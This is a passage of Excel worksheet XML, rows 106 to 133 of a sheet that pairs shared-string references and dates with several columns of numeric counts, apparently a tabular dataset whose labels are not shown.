      <c r="V106">
        <v>1423</v>
      </c>
      <c r="W106" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="107" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A107" t="s">
        <v>4</v>
      </c>
      <c r="B107">
        <v>44489.668331851855</v>
      </c>
      <c r="C107" t="s">
        <v>1304</v>
      </c>
      <c r="D107">
        <v>204</v>
      </c>
      <c r="E107" t="s">
        <v>1317</v>
      </c>
      <c r="F107">
        <v>201</v>
      </c>
      <c r="G107" t="s">
        <v>1318</v>
      </c>
      <c r="H107" t="s">
        <v>1319</v>
      </c>
      <c r="I107" t="s">
        <v>268</v>
      </c>
      <c r="J107" t="s">
        <v>566</v>
      </c>
      <c r="K107" t="s">
        <v>40</v>
      </c>
      <c r="L107" t="s">
        <v>83</v>
      </c>
      <c r="N107" t="s">
        <v>1320</v>
      </c>
      <c r="O107" t="s">
        <v>111</v>
      </c>
      <c r="Q107" t="s">
        <v>3525</v>
      </c>
      <c r="R107">
        <v>495</v>
      </c>
      <c r="S107">
        <v>68</v>
      </c>
      <c r="T107">
        <v>89</v>
      </c>
      <c r="U107">
        <v>1482</v>
      </c>
      <c r="V107">
        <v>1423</v>
      </c>
      <c r="W107" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="108" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A108" t="s">
        <v>4</v>
      </c>
      <c r="B108">
        <v>44419.612771296299</v>
      </c>
      <c r="C108" t="s">
        <v>1321</v>
      </c>
      <c r="D108">
        <v>100</v>
      </c>
      <c r="E108" t="s">
        <v>1322</v>
      </c>
      <c r="F108">
        <v>100</v>
      </c>
      <c r="G108" t="s">
        <v>1323</v>
      </c>
      <c r="H108" t="s">
        <v>1324</v>
      </c>
      <c r="I108" t="s">
        <v>196</v>
      </c>
      <c r="J108" t="s">
        <v>197</v>
      </c>
      <c r="K108" t="s">
        <v>18</v>
      </c>
      <c r="L108" t="s">
        <v>77</v>
      </c>
      <c r="M108" t="s">
        <v>18</v>
      </c>
      <c r="N108" t="s">
        <v>198</v>
      </c>
      <c r="Q108" t="s">
        <v>1325</v>
      </c>
      <c r="W108" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="109" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A109" t="s">
        <v>4</v>
      </c>
      <c r="B109">
        <v>44482.344109907404</v>
      </c>
      <c r="C109" t="s">
        <v>1326</v>
      </c>
      <c r="D109">
        <v>101</v>
      </c>
      <c r="E109" t="s">
        <v>1327</v>
      </c>
      <c r="F109">
        <v>101</v>
      </c>
      <c r="G109" t="s">
        <v>1328</v>
      </c>
      <c r="H109" t="s">
        <v>1329</v>
      </c>
      <c r="I109" t="s">
        <v>172</v>
      </c>
      <c r="J109" t="s">
        <v>1238</v>
      </c>
      <c r="K109" t="s">
        <v>13</v>
      </c>
      <c r="L109" t="s">
        <v>77</v>
      </c>
      <c r="M109" t="s">
        <v>1330</v>
      </c>
      <c r="N109" t="s">
        <v>522</v>
      </c>
      <c r="Q109" t="s">
        <v>1331</v>
      </c>
      <c r="R109">
        <v>27</v>
      </c>
      <c r="S109">
        <v>61</v>
      </c>
      <c r="T109">
        <v>27</v>
      </c>
      <c r="U109">
        <v>24</v>
      </c>
      <c r="V109">
        <v>89</v>
      </c>
      <c r="W109" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="110" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A110" t="s">
        <v>4</v>
      </c>
      <c r="B110">
        <v>44313.458974224537</v>
      </c>
      <c r="C110" t="s">
        <v>1332</v>
      </c>
      <c r="D110">
        <v>100</v>
      </c>
      <c r="E110" t="s">
        <v>1333</v>
      </c>
      <c r="F110">
        <v>100</v>
      </c>
      <c r="G110" t="s">
        <v>1334</v>
      </c>
      <c r="H110" t="s">
        <v>1335</v>
      </c>
      <c r="I110" t="s">
        <v>611</v>
      </c>
      <c r="J110" t="s">
        <v>612</v>
      </c>
      <c r="K110" t="s">
        <v>14</v>
      </c>
      <c r="L110" t="s">
        <v>77</v>
      </c>
      <c r="M110" t="s">
        <v>612</v>
      </c>
      <c r="N110" t="s">
        <v>1098</v>
      </c>
      <c r="O110" t="s">
        <v>1336</v>
      </c>
      <c r="Q110" t="s">
        <v>3526</v>
      </c>
      <c r="R110">
        <v>23170</v>
      </c>
      <c r="S110">
        <v>49335</v>
      </c>
      <c r="T110">
        <v>25980</v>
      </c>
      <c r="U110">
        <v>29402</v>
      </c>
      <c r="V110">
        <v>36749</v>
      </c>
      <c r="W110" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="111" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A111" t="s">
        <v>4</v>
      </c>
      <c r="B111">
        <v>44313.609465381945</v>
      </c>
      <c r="C111" t="s">
        <v>1338</v>
      </c>
      <c r="D111">
        <v>101</v>
      </c>
      <c r="E111" t="s">
        <v>1339</v>
      </c>
      <c r="F111">
        <v>101</v>
      </c>
      <c r="G111" t="s">
        <v>1340</v>
      </c>
      <c r="H111" t="s">
        <v>1341</v>
      </c>
      <c r="I111" t="s">
        <v>611</v>
      </c>
      <c r="J111" t="s">
        <v>612</v>
      </c>
      <c r="K111" t="s">
        <v>14</v>
      </c>
      <c r="L111" t="s">
        <v>77</v>
      </c>
      <c r="M111" t="s">
        <v>612</v>
      </c>
      <c r="N111" t="s">
        <v>1098</v>
      </c>
      <c r="Q111" t="s">
        <v>3527</v>
      </c>
      <c r="R111">
        <v>327517</v>
      </c>
      <c r="S111">
        <v>345337</v>
      </c>
      <c r="T111">
        <v>294764</v>
      </c>
      <c r="U111">
        <v>351097</v>
      </c>
      <c r="V111">
        <v>456909</v>
      </c>
      <c r="W111" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="112" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A112" t="s">
        <v>4</v>
      </c>
      <c r="B112">
        <v>44495.743048506942</v>
      </c>
      <c r="C112" t="s">
        <v>1343</v>
      </c>
      <c r="D112">
        <v>121</v>
      </c>
      <c r="E112" t="s">
        <v>1344</v>
      </c>
      <c r="F112">
        <v>101</v>
      </c>
      <c r="G112" t="s">
        <v>1345</v>
      </c>
      <c r="H112" t="s">
        <v>1346</v>
      </c>
      <c r="I112" t="s">
        <v>611</v>
      </c>
      <c r="J112" t="s">
        <v>612</v>
      </c>
      <c r="K112" t="s">
        <v>14</v>
      </c>
      <c r="L112" t="s">
        <v>77</v>
      </c>
      <c r="M112" t="s">
        <v>612</v>
      </c>
      <c r="N112" t="s">
        <v>1098</v>
      </c>
      <c r="O112" t="s">
        <v>1347</v>
      </c>
      <c r="Q112" t="s">
        <v>3528</v>
      </c>
      <c r="R112">
        <v>5080</v>
      </c>
      <c r="S112">
        <v>12534</v>
      </c>
      <c r="T112">
        <v>13396</v>
      </c>
      <c r="U112">
        <v>17380</v>
      </c>
      <c r="V112">
        <v>41948</v>
      </c>
      <c r="W112" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="113" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A113" t="s">
        <v>4</v>
      </c>
      <c r="B113">
        <v>44495.743048750002</v>
      </c>
      <c r="C113" t="s">
        <v>1343</v>
      </c>
      <c r="D113">
        <v>121</v>
      </c>
      <c r="E113" t="s">
        <v>1349</v>
      </c>
      <c r="F113">
        <v>100</v>
      </c>
      <c r="G113" t="s">
        <v>1350</v>
      </c>
      <c r="H113" t="s">
        <v>1351</v>
      </c>
      <c r="I113" t="s">
        <v>611</v>
      </c>
      <c r="J113" t="s">
        <v>612</v>
      </c>
      <c r="K113" t="s">
        <v>14</v>
      </c>
      <c r="L113" t="s">
        <v>77</v>
      </c>
      <c r="M113" t="s">
        <v>612</v>
      </c>
      <c r="N113" t="s">
        <v>1098</v>
      </c>
      <c r="O113" t="s">
        <v>1352</v>
      </c>
      <c r="Q113" t="s">
        <v>3528</v>
      </c>
      <c r="W113" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="114" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A114" t="s">
        <v>4</v>
      </c>
      <c r="B114">
        <v>44495.743048483797</v>
      </c>
      <c r="C114" t="s">
        <v>1343</v>
      </c>
      <c r="D114">
        <v>121</v>
      </c>
      <c r="E114" t="s">
        <v>1353</v>
      </c>
      <c r="F114">
        <v>201</v>
      </c>
      <c r="G114" t="s">
        <v>1354</v>
      </c>
      <c r="H114" t="s">
        <v>1355</v>
      </c>
      <c r="I114" t="s">
        <v>611</v>
      </c>
      <c r="J114" t="s">
        <v>612</v>
      </c>
      <c r="K114" t="s">
        <v>14</v>
      </c>
      <c r="L114" t="s">
        <v>77</v>
      </c>
      <c r="M114" t="s">
        <v>612</v>
      </c>
      <c r="N114" t="s">
        <v>1098</v>
      </c>
      <c r="O114" t="s">
        <v>1356</v>
      </c>
      <c r="Q114" t="s">
        <v>3528</v>
      </c>
      <c r="R114">
        <v>745</v>
      </c>
      <c r="S114">
        <v>699</v>
      </c>
      <c r="T114">
        <v>607</v>
      </c>
      <c r="U114">
        <v>534</v>
      </c>
      <c r="V114">
        <v>621</v>
      </c>
      <c r="W114" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="115" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A115" t="s">
        <v>4</v>
      </c>
      <c r="B115">
        <v>44505.681300208336</v>
      </c>
      <c r="C115" t="s">
        <v>1357</v>
      </c>
      <c r="D115">
        <v>100</v>
      </c>
      <c r="E115" t="s">
        <v>1358</v>
      </c>
      <c r="F115">
        <v>100</v>
      </c>
      <c r="G115" t="s">
        <v>1359</v>
      </c>
      <c r="H115" t="s">
        <v>1360</v>
      </c>
      <c r="I115" t="s">
        <v>268</v>
      </c>
      <c r="J115" t="s">
        <v>269</v>
      </c>
      <c r="K115" t="s">
        <v>10</v>
      </c>
      <c r="L115" t="s">
        <v>77</v>
      </c>
      <c r="M115" t="s">
        <v>270</v>
      </c>
      <c r="N115" t="s">
        <v>271</v>
      </c>
      <c r="Q115" t="s">
        <v>3529</v>
      </c>
      <c r="U115">
        <v>80</v>
      </c>
      <c r="V115">
        <v>79</v>
      </c>
      <c r="W115" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="116" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A116" t="s">
        <v>4</v>
      </c>
      <c r="B116">
        <v>44505.681300277778</v>
      </c>
      <c r="C116" t="s">
        <v>1357</v>
      </c>
      <c r="D116">
        <v>100</v>
      </c>
      <c r="E116" t="s">
        <v>1362</v>
      </c>
      <c r="F116">
        <v>100</v>
      </c>
      <c r="G116" t="s">
        <v>1363</v>
      </c>
      <c r="H116" t="s">
        <v>1364</v>
      </c>
      <c r="I116" t="s">
        <v>268</v>
      </c>
      <c r="J116" t="s">
        <v>269</v>
      </c>
      <c r="K116" t="s">
        <v>10</v>
      </c>
      <c r="L116" t="s">
        <v>77</v>
      </c>
      <c r="M116" t="s">
        <v>270</v>
      </c>
      <c r="N116" t="s">
        <v>271</v>
      </c>
      <c r="Q116" t="s">
        <v>3529</v>
      </c>
      <c r="R116">
        <v>67</v>
      </c>
      <c r="S116">
        <v>418</v>
      </c>
      <c r="T116">
        <v>223</v>
      </c>
      <c r="U116">
        <v>647</v>
      </c>
      <c r="V116">
        <v>975</v>
      </c>
      <c r="W116" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="117" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A117" t="s">
        <v>4</v>
      </c>
      <c r="B117">
        <v>44505.681300266202</v>
      </c>
      <c r="C117" t="s">
        <v>1357</v>
      </c>
      <c r="D117">
        <v>100</v>
      </c>
      <c r="E117" t="s">
        <v>1365</v>
      </c>
      <c r="F117">
        <v>100</v>
      </c>
      <c r="G117" t="s">
        <v>1366</v>
      </c>
      <c r="H117" t="s">
        <v>1367</v>
      </c>
      <c r="I117" t="s">
        <v>268</v>
      </c>
      <c r="J117" t="s">
        <v>269</v>
      </c>
      <c r="K117" t="s">
        <v>10</v>
      </c>
      <c r="L117" t="s">
        <v>77</v>
      </c>
      <c r="M117" t="s">
        <v>270</v>
      </c>
      <c r="N117" t="s">
        <v>271</v>
      </c>
      <c r="Q117" t="s">
        <v>3529</v>
      </c>
      <c r="R117">
        <v>5220</v>
      </c>
      <c r="S117">
        <v>4317</v>
      </c>
      <c r="T117">
        <v>6269</v>
      </c>
      <c r="U117">
        <v>6332</v>
      </c>
      <c r="V117">
        <v>5931</v>
      </c>
      <c r="W117" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="118" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A118" t="s">
        <v>4</v>
      </c>
      <c r="B118">
        <v>44320.592346851852</v>
      </c>
      <c r="C118" t="s">
        <v>1368</v>
      </c>
      <c r="D118">
        <v>111</v>
      </c>
      <c r="E118" t="s">
        <v>1369</v>
      </c>
      <c r="F118">
        <v>101</v>
      </c>
      <c r="G118" t="s">
        <v>1370</v>
      </c>
      <c r="H118" t="s">
        <v>1371</v>
      </c>
      <c r="I118" t="s">
        <v>611</v>
      </c>
      <c r="J118" t="s">
        <v>612</v>
      </c>
      <c r="K118" t="s">
        <v>14</v>
      </c>
      <c r="L118" t="s">
        <v>77</v>
      </c>
      <c r="M118" t="s">
        <v>612</v>
      </c>
      <c r="N118" t="s">
        <v>1098</v>
      </c>
      <c r="O118" t="s">
        <v>1372</v>
      </c>
      <c r="Q118" t="s">
        <v>3530</v>
      </c>
      <c r="V118">
        <v>48</v>
      </c>
      <c r="W118" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="119" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A119" t="s">
        <v>4</v>
      </c>
      <c r="B119">
        <v>44320.592346874997</v>
      </c>
      <c r="C119" t="s">
        <v>1368</v>
      </c>
      <c r="D119">
        <v>111</v>
      </c>
      <c r="E119" t="s">
        <v>1374</v>
      </c>
      <c r="F119">
        <v>102</v>
      </c>
      <c r="G119" t="s">
        <v>1375</v>
      </c>
      <c r="H119" t="s">
        <v>1376</v>
      </c>
      <c r="I119" t="s">
        <v>611</v>
      </c>
      <c r="J119" t="s">
        <v>612</v>
      </c>
      <c r="K119" t="s">
        <v>14</v>
      </c>
      <c r="L119" t="s">
        <v>77</v>
      </c>
      <c r="M119" t="s">
        <v>612</v>
      </c>
      <c r="N119" t="s">
        <v>1098</v>
      </c>
      <c r="O119" t="s">
        <v>1377</v>
      </c>
      <c r="P119" t="s">
        <v>612</v>
      </c>
      <c r="Q119" t="s">
        <v>3530</v>
      </c>
      <c r="U119">
        <v>3</v>
      </c>
      <c r="V119">
        <v>37</v>
      </c>
      <c r="W119" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="120" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A120" t="s">
        <v>4</v>
      </c>
      <c r="B120">
        <v>44655.658999687497</v>
      </c>
      <c r="C120" t="s">
        <v>1378</v>
      </c>
      <c r="D120">
        <v>100</v>
      </c>
      <c r="E120" t="s">
        <v>1379</v>
      </c>
      <c r="F120">
        <v>100</v>
      </c>
      <c r="G120" t="s">
        <v>1380</v>
      </c>
      <c r="H120" t="s">
        <v>1381</v>
      </c>
      <c r="I120" t="s">
        <v>611</v>
      </c>
      <c r="J120" t="s">
        <v>612</v>
      </c>
      <c r="K120" t="s">
        <v>14</v>
      </c>
      <c r="L120" t="s">
        <v>77</v>
      </c>
      <c r="M120" t="s">
        <v>612</v>
      </c>
      <c r="N120" t="s">
        <v>1098</v>
      </c>
      <c r="Q120" t="s">
        <v>161</v>
      </c>
      <c r="W120" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="121" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A121" t="s">
        <v>4</v>
      </c>
      <c r="B121">
        <v>44790.693671215275</v>
      </c>
      <c r="C121" t="s">
        <v>1382</v>
      </c>
      <c r="D121">
        <v>112</v>
      </c>
      <c r="E121" t="s">
        <v>1383</v>
      </c>
      <c r="F121">
        <v>112</v>
      </c>
      <c r="G121" t="s">
        <v>1384</v>
      </c>
      <c r="H121" t="s">
        <v>1351</v>
      </c>
      <c r="I121" t="s">
        <v>611</v>
      </c>
      <c r="J121" t="s">
        <v>612</v>
      </c>
      <c r="K121" t="s">
        <v>14</v>
      </c>
      <c r="L121" t="s">
        <v>77</v>
      </c>
      <c r="M121" t="s">
        <v>612</v>
      </c>
      <c r="N121" t="s">
        <v>1098</v>
      </c>
      <c r="O121" t="s">
        <v>1352</v>
      </c>
      <c r="Q121" t="s">
        <v>1385</v>
      </c>
      <c r="W121" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="122" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A122" t="s">
        <v>4</v>
      </c>
      <c r="B122">
        <v>44154.744477476852</v>
      </c>
      <c r="C122" t="s">
        <v>1386</v>
      </c>
      <c r="D122">
        <v>100</v>
      </c>
      <c r="E122" t="s">
        <v>1387</v>
      </c>
      <c r="F122">
        <v>100</v>
      </c>
      <c r="G122" t="s">
        <v>1388</v>
      </c>
      <c r="H122" t="s">
        <v>1389</v>
      </c>
      <c r="I122" t="s">
        <v>185</v>
      </c>
      <c r="J122" t="s">
        <v>186</v>
      </c>
      <c r="K122" t="s">
        <v>16</v>
      </c>
      <c r="L122" t="s">
        <v>83</v>
      </c>
      <c r="M122" t="s">
        <v>72</v>
      </c>
      <c r="O122" t="s">
        <v>1390</v>
      </c>
      <c r="Q122" t="s">
        <v>3531</v>
      </c>
      <c r="R122">
        <v>875141</v>
      </c>
      <c r="S122">
        <v>758501</v>
      </c>
      <c r="T122">
        <v>745088</v>
      </c>
      <c r="U122">
        <v>662870</v>
      </c>
      <c r="V122">
        <v>803013</v>
      </c>
      <c r="W122" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="123" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A123" t="s">
        <v>4</v>
      </c>
      <c r="B123">
        <v>44331.307228090278</v>
      </c>
      <c r="C123" t="s">
        <v>1392</v>
      </c>
      <c r="D123">
        <v>103</v>
      </c>
      <c r="E123" t="s">
        <v>1393</v>
      </c>
      <c r="F123">
        <v>103</v>
      </c>
      <c r="G123" t="s">
        <v>1394</v>
      </c>
      <c r="H123" t="s">
        <v>1355</v>
      </c>
      <c r="I123" t="s">
        <v>611</v>
      </c>
      <c r="J123" t="s">
        <v>612</v>
      </c>
      <c r="K123" t="s">
        <v>14</v>
      </c>
      <c r="L123" t="s">
        <v>77</v>
      </c>
      <c r="M123" t="s">
        <v>612</v>
      </c>
      <c r="N123" t="s">
        <v>1098</v>
      </c>
      <c r="O123" t="s">
        <v>1395</v>
      </c>
      <c r="Q123" t="s">
        <v>3532</v>
      </c>
      <c r="R123">
        <v>2606116</v>
      </c>
      <c r="S123">
        <v>2459726</v>
      </c>
      <c r="T123">
        <v>2282047</v>
      </c>
      <c r="U123">
        <v>8581277</v>
      </c>
      <c r="V123">
        <v>9406094</v>
      </c>
      <c r="W123" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="124" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A124" t="s">
        <v>4</v>
      </c>
      <c r="B124">
        <v>44335.522551319445</v>
      </c>
      <c r="C124" t="s">
        <v>1397</v>
      </c>
      <c r="D124">
        <v>100</v>
      </c>
      <c r="E124" t="s">
        <v>1398</v>
      </c>
      <c r="F124">
        <v>100</v>
      </c>
      <c r="G124" t="s">
        <v>1399</v>
      </c>
      <c r="H124" t="s">
        <v>1355</v>
      </c>
      <c r="I124" t="s">
        <v>611</v>
      </c>
      <c r="J124" t="s">
        <v>612</v>
      </c>
      <c r="K124" t="s">
        <v>14</v>
      </c>
      <c r="L124" t="s">
        <v>77</v>
      </c>
      <c r="M124" t="s">
        <v>612</v>
      </c>
      <c r="N124" t="s">
        <v>1098</v>
      </c>
      <c r="Q124" t="s">
        <v>1400</v>
      </c>
      <c r="W124" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="125" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A125" t="s">
        <v>4</v>
      </c>
      <c r="B125">
        <v>43962.765995185182</v>
      </c>
      <c r="C125" t="s">
        <v>1401</v>
      </c>
      <c r="D125">
        <v>100</v>
      </c>
      <c r="E125" t="s">
        <v>1402</v>
      </c>
      <c r="F125">
        <v>100</v>
      </c>
      <c r="G125" t="s">
        <v>1403</v>
      </c>
      <c r="H125" t="s">
        <v>1404</v>
      </c>
      <c r="I125" t="s">
        <v>196</v>
      </c>
      <c r="J125" t="s">
        <v>197</v>
      </c>
      <c r="K125" t="s">
        <v>18</v>
      </c>
      <c r="L125" t="s">
        <v>77</v>
      </c>
      <c r="M125" t="s">
        <v>18</v>
      </c>
      <c r="N125" t="s">
        <v>198</v>
      </c>
      <c r="O125" t="s">
        <v>1405</v>
      </c>
      <c r="P125" t="s">
        <v>960</v>
      </c>
      <c r="Q125" t="s">
        <v>1406</v>
      </c>
      <c r="R125">
        <v>60497</v>
      </c>
      <c r="S125">
        <v>46015</v>
      </c>
      <c r="T125">
        <v>45228</v>
      </c>
      <c r="U125">
        <v>44692</v>
      </c>
      <c r="V125">
        <v>37815</v>
      </c>
      <c r="W125" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="126" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A126" t="s">
        <v>4</v>
      </c>
      <c r="B126">
        <v>44466.840868703701</v>
      </c>
      <c r="C126" t="s">
        <v>1401</v>
      </c>
      <c r="D126">
        <v>120</v>
      </c>
      <c r="E126" t="s">
        <v>1402</v>
      </c>
      <c r="F126">
        <v>120</v>
      </c>
      <c r="G126" t="s">
        <v>1403</v>
      </c>
      <c r="H126" t="s">
        <v>1404</v>
      </c>
      <c r="I126" t="s">
        <v>196</v>
      </c>
      <c r="J126" t="s">
        <v>197</v>
      </c>
      <c r="K126" t="s">
        <v>18</v>
      </c>
      <c r="L126" t="s">
        <v>77</v>
      </c>
      <c r="M126" t="s">
        <v>18</v>
      </c>
      <c r="N126" t="s">
        <v>198</v>
      </c>
      <c r="O126" t="s">
        <v>1405</v>
      </c>
      <c r="P126" t="s">
        <v>960</v>
      </c>
      <c r="Q126" t="s">
        <v>3533</v>
      </c>
      <c r="R126">
        <v>60497</v>
      </c>
      <c r="S126">
        <v>46015</v>
      </c>
      <c r="T126">
        <v>45228</v>
      </c>
      <c r="U126">
        <v>44692</v>
      </c>
      <c r="V126">
        <v>37815</v>
      </c>
      <c r="W126" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="127" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A127" t="s">
        <v>4</v>
      </c>
      <c r="B127">
        <v>44377.710028506946</v>
      </c>
      <c r="C127" t="s">
        <v>1422</v>
      </c>
      <c r="D127">
        <v>100</v>
      </c>
      <c r="E127" t="s">
        <v>1423</v>
      </c>
      <c r="F127">
        <v>100</v>
      </c>
      <c r="G127" t="s">
        <v>1424</v>
      </c>
      <c r="H127" t="s">
        <v>1425</v>
      </c>
      <c r="I127" t="s">
        <v>172</v>
      </c>
      <c r="J127" t="s">
        <v>173</v>
      </c>
      <c r="K127" t="s">
        <v>13</v>
      </c>
      <c r="L127" t="s">
        <v>83</v>
      </c>
      <c r="M127" t="s">
        <v>72</v>
      </c>
      <c r="N127" t="s">
        <v>174</v>
      </c>
      <c r="Q127" t="s">
        <v>151</v>
      </c>
      <c r="R127">
        <v>1</v>
      </c>
      <c r="S127">
        <v>23</v>
      </c>
      <c r="T127">
        <v>736</v>
      </c>
      <c r="U127">
        <v>13533</v>
      </c>
      <c r="V127">
        <v>60179</v>
      </c>
      <c r="W127" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="128" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A128" t="s">
        <v>4</v>
      </c>
      <c r="B128">
        <v>44377.710028530091</v>
      </c>
      <c r="C128" t="s">
        <v>1422</v>
      </c>
      <c r="D128">
        <v>100</v>
      </c>
      <c r="E128" t="s">
        <v>1426</v>
      </c>
      <c r="F128">
        <v>100</v>
      </c>
      <c r="G128" t="s">
        <v>1427</v>
      </c>
      <c r="H128" t="s">
        <v>1428</v>
      </c>
      <c r="I128" t="s">
        <v>172</v>
      </c>
      <c r="J128" t="s">
        <v>173</v>
      </c>
      <c r="K128" t="s">
        <v>13</v>
      </c>
      <c r="L128" t="s">
        <v>83</v>
      </c>
      <c r="M128" t="s">
        <v>72</v>
      </c>
      <c r="N128" t="s">
        <v>174</v>
      </c>
      <c r="Q128" t="s">
        <v>151</v>
      </c>
      <c r="W128" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="129" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A129" t="s">
        <v>4</v>
      </c>
      <c r="B129">
        <v>44223.633561516202</v>
      </c>
      <c r="C129" t="s">
        <v>1429</v>
      </c>
      <c r="D129">
        <v>103</v>
      </c>
      <c r="E129" t="s">
        <v>1430</v>
      </c>
      <c r="F129">
        <v>103</v>
      </c>
      <c r="G129" t="s">
        <v>1431</v>
      </c>
      <c r="H129" t="s">
        <v>1432</v>
      </c>
      <c r="I129" t="s">
        <v>268</v>
      </c>
      <c r="J129" t="s">
        <v>566</v>
      </c>
      <c r="K129" t="s">
        <v>12</v>
      </c>
      <c r="L129" t="s">
        <v>77</v>
      </c>
      <c r="M129" t="s">
        <v>622</v>
      </c>
      <c r="N129" t="s">
        <v>623</v>
      </c>
      <c r="Q129" t="s">
        <v>3534</v>
      </c>
      <c r="U129">
        <v>2</v>
      </c>
      <c r="V129">
        <v>2</v>
      </c>
      <c r="W129" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="130" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A130" t="s">
        <v>4</v>
      </c>
      <c r="B130">
        <v>44534.414179247688</v>
      </c>
      <c r="C130" t="s">
        <v>1434</v>
      </c>
      <c r="D130">
        <v>100</v>
      </c>
      <c r="E130" t="s">
        <v>1435</v>
      </c>
      <c r="F130">
        <v>100</v>
      </c>
      <c r="G130" t="s">
        <v>1436</v>
      </c>
      <c r="H130" t="s">
        <v>1437</v>
      </c>
      <c r="I130" t="s">
        <v>268</v>
      </c>
      <c r="J130" t="s">
        <v>566</v>
      </c>
      <c r="K130" t="s">
        <v>12</v>
      </c>
      <c r="L130" t="s">
        <v>77</v>
      </c>
      <c r="M130" t="s">
        <v>622</v>
      </c>
      <c r="N130" t="s">
        <v>623</v>
      </c>
      <c r="Q130" t="s">
        <v>3535</v>
      </c>
      <c r="V130">
        <v>2</v>
      </c>
      <c r="W130" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="131" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A131" t="s">
        <v>4</v>
      </c>
      <c r="B131">
        <v>44165.384758321758</v>
      </c>
      <c r="C131" t="s">
        <v>1439</v>
      </c>
      <c r="D131">
        <v>102</v>
      </c>
      <c r="E131" t="s">
        <v>1440</v>
      </c>
      <c r="F131">
        <v>102</v>
      </c>
      <c r="G131" t="s">
        <v>1441</v>
      </c>
      <c r="H131" t="s">
        <v>1442</v>
      </c>
      <c r="I131" t="s">
        <v>172</v>
      </c>
      <c r="J131" t="s">
        <v>173</v>
      </c>
      <c r="K131" t="s">
        <v>13</v>
      </c>
      <c r="L131" t="s">
        <v>83</v>
      </c>
      <c r="M131" t="s">
        <v>72</v>
      </c>
      <c r="N131" t="s">
        <v>522</v>
      </c>
      <c r="O131" t="s">
        <v>1443</v>
      </c>
      <c r="P131" t="s">
        <v>738</v>
      </c>
      <c r="Q131" t="s">
        <v>3536</v>
      </c>
      <c r="R131">
        <v>45035</v>
      </c>
      <c r="S131">
        <v>40844</v>
      </c>
      <c r="T131">
        <v>43006</v>
      </c>
      <c r="U131">
        <v>213670</v>
      </c>
      <c r="V131">
        <v>575549</v>
      </c>
      <c r="W131" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="132" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A132" t="s">
        <v>4</v>
      </c>
      <c r="B132">
        <v>44580.691867928239</v>
      </c>
      <c r="C132" t="s">
        <v>1445</v>
      </c>
      <c r="D132">
        <v>101</v>
      </c>
      <c r="E132" t="s">
        <v>1446</v>
      </c>
      <c r="F132">
        <v>101</v>
      </c>
      <c r="G132" t="s">
        <v>1447</v>
      </c>
      <c r="H132" t="s">
        <v>1448</v>
      </c>
      <c r="I132" t="s">
        <v>611</v>
      </c>
      <c r="J132" t="s">
        <v>612</v>
      </c>
      <c r="K132" t="s">
        <v>14</v>
      </c>
      <c r="L132" t="s">
        <v>77</v>
      </c>
      <c r="M132" t="s">
        <v>612</v>
      </c>
      <c r="N132" t="s">
        <v>1098</v>
      </c>
      <c r="O132" t="s">
        <v>1449</v>
      </c>
      <c r="Q132" t="s">
        <v>3537</v>
      </c>
      <c r="R132">
        <v>234</v>
      </c>
      <c r="S132">
        <v>2780</v>
      </c>
      <c r="T132">
        <v>271</v>
      </c>
      <c r="U132">
        <v>1164</v>
      </c>
      <c r="V132">
        <v>867</v>
      </c>
      <c r="W132" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="133" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A133" t="s">
        <v>4</v>
      </c>
      <c r="B133">
        <v>44342.648591805555</v>
      </c>
      <c r="C133" t="s">
        <v>1451</v>
      </c>
      <c r="D133">
        <v>103</v>
      </c>
      <c r="E133" t="s">
        <v>1452</v>
      </c>
      <c r="F133">
        <v>103</v>
      </c>
      <c r="G133" t="s">
        <v>1453</v>
      </c>
      <c r="H133" t="s">
        <v>1454</v>
      </c>
      <c r="I133" t="s">
        <v>172</v>
      </c>
      <c r="J133" t="s">
        <v>173</v>
      </c>
      <c r="K133" t="s">
        <v>13</v>
      </c>
      <c r="L133" t="s">
        <v>83</v>
      </c>
      <c r="M133" t="s">
        <v>72</v>
      </c>
